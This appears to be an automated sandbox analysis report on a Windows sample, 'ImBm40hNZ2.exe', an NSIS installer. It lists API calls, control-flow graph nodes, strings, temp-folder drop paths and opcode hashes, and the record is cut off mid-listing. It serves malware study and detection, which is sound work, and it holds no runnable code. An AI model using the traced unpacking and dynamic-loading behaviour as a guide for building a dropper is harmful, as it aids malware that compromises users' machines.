                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
                                                                                                                                                                                                                                                                • Instruction ID: d998dab733500fc6835523815e3f31be6148439617fe8245f85c198535f3b19e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0A072608110ABD700E7B89949AEEB768DB21324F60467BE141B20C1D7B89A41EA2A

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\,756A3410,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000), ref: 00403695
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens,1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040370A
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403728
                                                                                                                                                                                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens), ref: 00403771
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 004037AE
                                                                                                                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
                                                                                                                                                                                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403831
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 00403873
                                                                                                                                                                                                                                                                • DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 184 402c29-402c77 GetTickCount GetModuleFileNameA call 405822 187 402c83-402cb1 call 405b91 call 405668 call 405b91 GetFileSize 184->187 188 402c79-402c7e 184->188 196 402cb7 187->196 197 402d9e-402dac call 402bc5 187->197 189 402e5b-402e5f 188->189 199 402cbc-402cd3 196->199 203 402e01-402e06 197->203 204 402dae-402db1 197->204 201 402cd5 199->201 202 402cd7-402ce0 call 403081 199->202 201->202 210 402ce6-402ced 202->210 211 402e08-402e10 call 402bc5 202->211 203->189 206 402db3-402dcb call 403097 call 403081 204->206 207 402dd5-402dff GlobalAlloc call 403097 call 402e62 204->207 206->203 232 402dcd-402dd3 206->232 207->203 231 402e12-402e23 207->231 215 402d69-402d6d 210->215 216 402cef-402d03 call 4057dd 210->216 211->203 220 402d77-402d7d 215->220 221 402d6f-402d76 call 402bc5 215->221 216->220 235 402d05-402d0c 216->235 226 402d8c-402d96 220->226 227 402d7f-402d89 call 405f2e 220->227 221->220 226->199 230 402d9c 226->230 227->226 230->197 236 402e25 231->236 237 402e2b-402e30 231->237 232->203 232->207 235->220 239 402d0e-402d15 235->239 236->237 241 402e31-402e37 237->241 239->220 240 402d17-402d1e 239->240 240->220 242 402d20-402d27 240->242 241->241 243 402e39-402e54 SetFilePointer call 4057dd 241->243 242->220 244 402d29-402d49 242->244 247 402e59 243->247 244->203 246 402d4f-402d53 244->246 248 402d55-402d59 246->248 249 402d5b-402d63 246->249 247->189 248->230 248->249 249->220 250 402d65-402d67 249->250 250->220
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C3A
                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ImBm40hNZ2.exe,00000400), ref: 00402C56
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00402CA2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
                                                                                                                                                                                                                                                                • Null, xrefs: 00402D20
                                                                                                                                                                                                                                                                • Inst, xrefs: 00402D0E
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C33
                                                                                                                                                                                                                                                                • soft, xrefs: 00402D17
                                                                                                                                                                                                                                                                • "C:\Users\user\Desktop\ImBm40hNZ2.exe", xrefs: 00402C29
                                                                                                                                                                                                                                                                • C:\Users\user\Desktop\ImBm40hNZ2.exe, xrefs: 00402C40, 00402C4F, 00402C63, 00402C83
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00402C79
                                                                                                                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 00402C84, 00402C89, 00402C8F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ImBm40hNZ2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 382 40173f-401762 call 4029fd call 40568e 387 401764-40176a call 405b91 382->387 388 40176c-40177e call 405b91 call 405621 lstrcatA 382->388 393 401783-401789 call 405dfc 387->393 388->393 398 40178e-401792 393->398 399 401794-40179e call 405e95 398->399 400 4017c5-4017c8 398->400 407 4017b0-4017c2 399->407 408 4017a0-4017ae CompareFileTime 399->408 401 4017d0-4017ec call 405822 400->401 402 4017ca-4017cb call 4057fd 400->402 410 401864-40188d call 404e7c call 402e62 401->410 411 4017ee-4017f1 401->411 402->401 407->400 408->407 423 401895-4018a1 SetFileTime 410->423 424 40188f-401893 410->424 412 4017f3-401835 call 405b91 * 2 call 405bb3 call 405b91 call 4053a5 411->412 413 401846-401850 call 404e7c 411->413 412->398 445 40183b-40183c 412->445 425 401859-40185f 413->425 427 4018a7-4018b2 CloseHandle 423->427 424->423 424->427 428 40289b 425->428 430 402892-402895 427->430 431 4018b8-4018bb 427->431 432 40289d-4028a1 428->432 430->428 435 4018d0-4018d3 call 405bb3 431->435 436 4018bd-4018ce call 405bb3 lstrcatA 431->436 442 4018d8-40222b call 4053a5 435->442 436->442 442->432 445->425 447 40183e-40183f 445->447 447->413
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 0040177E
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 004017A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp$C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll$Call
                                                                                                                                                                                                                                                                • API String ID: 1941528284-1413993741

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ECA
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402F6F
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402FA8
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041AFD0,7FFFFFFF,00000000), ref: 00402FD6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                                                                                                • API String ID: 4209647438-2449383134

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401D29
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                                                • String ID: Tahoma
                                                                                                                                                                                                                                                                • API String ID: 3808545654-3580928618

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                                                                                • API String ID: 2987980305-2386870291
                                                                                                                                                                                                                                                                • Opcode ID: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
                                                                                                                                                                                                                                                                • Instruction ID: c9057b5ece4bb598837aab6aa7fd84f94fd7ed62459683fea6a67aa899d5519e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B212B32904215F7DB107FA5CE4DA6E39B0AB48358F70823BF600B62D0DBBC4D419A6E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 582 4015b3-4015c6 call 4029fd call 4056ba 587 4015c8-4015e3 call 40564c CreateDirectoryA 582->587 588 40160a-40160d 582->588 595 401600-401608 587->595 596 4015e5-4015f0 GetLastError 587->596 590 401638-402181 call 401423 588->590 591 40160f-40162a call 401423 call 405b91 SetCurrentDirectoryA 588->591 603 402892-4028a1 590->603 591->603 606 401630-401633 591->606 595->587 595->588 599 4015f2-4015fb GetFileAttributesA 596->599 600 4015fd 596->600 599->595 599->600 600->595 606->603
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 00401617
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
                                                                                                                                                                                                                                                                • API String ID: 3751793516-378292206
                                                                                                                                                                                                                                                                • Opcode ID: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
                                                                                                                                                                                                                                                                • Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 608 405851-40585b 609 40585c-405887 GetTickCount GetTempFileNameA 608->609 610 405896-405898 609->610 611 405889-40588b 609->611 612 405890-405893 610->612 611->609 613 40588d 611->613 613->612
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405865
                                                                                                                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 0040587F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-1911354995
                                                                                                                                                                                                                                                                • Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                                                                                                                                                                                                                • Instruction ID: 4003a4fe6d6a1be2c7c6231cfd42d77a102930ba0be0d4b8b296abf0166e01cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF05E366482086ADB109A56DC44F9A7B99DB95750F14C02AF904AA180D6B099548B59

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 614 100016da-10001716 call 10001a86 618 10001827-10001829 614->618 619 1000171c-10001720 614->619 620 10001722-10001728 call 100021ce 619->620 621 10001729-10001736 call 10002218 619->621 620->621 626 10001766-1000176d 621->626 627 10001738-1000173d 621->627 628 1000178d-10001791 626->628 629 1000176f-1000178b call 100023d6 call 10001576 call 10001278 GlobalFree 626->629 630 10001758-1000175b 627->630 631 1000173f-10001740 627->631 632 10001793-100017cd call 10001576 call 100023d6 628->632 633 100017cf-100017d5 call 100023d6 628->633 654 100017d6-100017da 629->654 630->626 634 1000175d-1000175e call 10002abb 630->634 636 10001742-10001743 631->636 637 10001748-10001749 call 10002800 631->637 632->654 633->654 648 10001763 634->648 643 10001750-10001756 call 100025a2 636->643 644 10001745-10001746 636->644 645 1000174e 637->645 653 10001765 643->653 644->626 644->637 645->648 648->653 653->626 658 10001817-1000181e 654->658 659 100017dc-100017ea call 1000239c 654->659 658->618 661 10001820-10001821 GlobalFree 658->661 664 10001802-10001809 659->664 665 100017ec-100017ef 659->665 661->618 664->658 667 1000180b-10001816 call 100014ff 664->667 665->664 666 100017f1-100017f9 665->666 666->664 668 100017fb-100017fc FreeLibrary 666->668 667->658 668->664
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                                                                                                                                                                                                  • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
                                                                                                                                                                                                                                                                  • Part of subcall function 100025A2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 10002614
                                                                                                                                                                                                                                                                  • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243D
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F0
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002519
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1767494692-3916222277

                                                                                                                                                                                                                                                                Control-flow Graph

[Control-flow graph for the code starting at 401bb8; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
